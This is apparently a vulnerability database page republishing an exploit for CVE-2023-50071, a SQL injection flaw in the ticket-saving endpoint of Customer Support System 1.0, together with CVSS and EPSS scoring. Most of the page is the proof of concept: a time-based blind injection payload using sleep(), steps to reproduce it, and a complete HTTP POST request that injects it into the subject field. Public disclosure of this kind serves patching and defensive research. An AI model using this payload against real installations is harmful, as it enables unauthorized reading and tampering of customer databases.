Customer Support System 1.0 SQL Injection Vulnerability

2024-03-0600:00:00

Geraldo Alcantara

0day.today

152

sql injection

customer support system 1.0

geraldo alcantara

cve-2023-50071

windows

ajax

arbitrary sql commands

payload

application login

new ticket creation

malicious payload

parameters

request headers

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

9 High

AI Score

Confidence

High

0.001 Low

EPSS

Percentile

22.8%

JSON

Customer Support System version 1.0 suffers from a remote SQL injection vulnerability in /customer_support/ajax.php. Original discovery of SQL injection in this version is attributed to Ahmed Abbas in November of 2020.

# Exploit Title: Customer Support System 1.0 - Multiple SQL injection
vulnerabilities
# Exploit Author: Geraldo Alcantara
# Vendor Homepage:
https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
# Software Link:
https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Windows
# CVE : CVE-2023-50071
*Description*: Multiple SQL injection vulnerabilities in
/customer_support/ajax.php?action=save_ticket in Customer Support
System 1.0 allow authenticated attackers to execute arbitrary SQL
commands via department_id, customer_id and subject.*Payload*:
'+(select*from(select(sleep(20)))a)+'
*Steps to reproduce*:

1- Log in to the application.

2- Navigate to the page /customer_support/index.php?page=new_ticket.

3- Create a new ticket and insert a malicious payload into one of the
following parameters: department_id, customer_id, or subject.
*Request:*
POST /customer_support/ajax.php?action=save_ticket HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0)
Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------81419250823331111993422505835
Content-Length: 853
Origin: http://192.168.68.148
Connection: close
Referer: http://192.168.68.148/customer_support/index.php?page=new_ticket
Cookie: csrftoken=1hWW6JE5vLFhJv2y8LwgL3WNPbPJ3J2WAX9F2U0Fd5H5t6DSztkJWD4nWFrbF8ko;
sessionid=xrn1sshbol1vipddxsijmgkdp2q4qdgq;
PHPSESSID=mfd30tu0h0s43s7kdjb74fcu0l

-----------------------------81419250823331111993422505835
Content-Disposition: form-data; name="id"


-----------------------------81419250823331111993422505835
Content-Disposition: form-data; name="subject"

teste'+(select*from(select(sleep(5)))a)+'
-----------------------------81419250823331111993422505835
Content-Disposition: form-data; name="customer_id"

3
-----------------------------81419250823331111993422505835
Content-Disposition: form-data; name="department_id"

4
-----------------------------81419250823331111993422505835
Content-Disposition: form-data; name="description"

<p>Blahs<br></p>
-----------------------------81419250823331111993422505835
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream


-----------------------------81419250823331111993422505835--